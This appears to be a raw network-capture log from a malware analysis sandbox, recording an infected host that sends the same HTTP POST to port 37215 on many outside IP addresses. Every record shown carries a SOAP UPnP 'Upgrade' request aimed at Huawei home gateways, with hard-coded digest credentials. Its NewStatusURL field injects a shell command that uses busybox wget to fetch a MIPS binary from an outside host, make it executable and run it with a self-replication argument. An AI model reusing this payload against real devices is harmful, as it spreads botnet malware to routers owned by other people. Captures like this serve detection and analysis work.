                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          934192.168.2.1543462197.232.0.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713161945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          935192.168.2.1555998197.241.41.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713188887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          936192.168.2.1557486197.20.36.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713215113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          937192.168.2.1548732157.160.194.24737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713260889 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          938192.168.2.1558518157.197.143.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713299036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          939192.168.2.1556358122.163.123.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713310003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          940192.168.2.156079841.43.57.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713418961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          941192.168.2.1537442197.200.34.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713440895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          942192.168.2.1543306197.176.28.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713468075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          943192.168.2.153966841.2.222.13137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713490009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 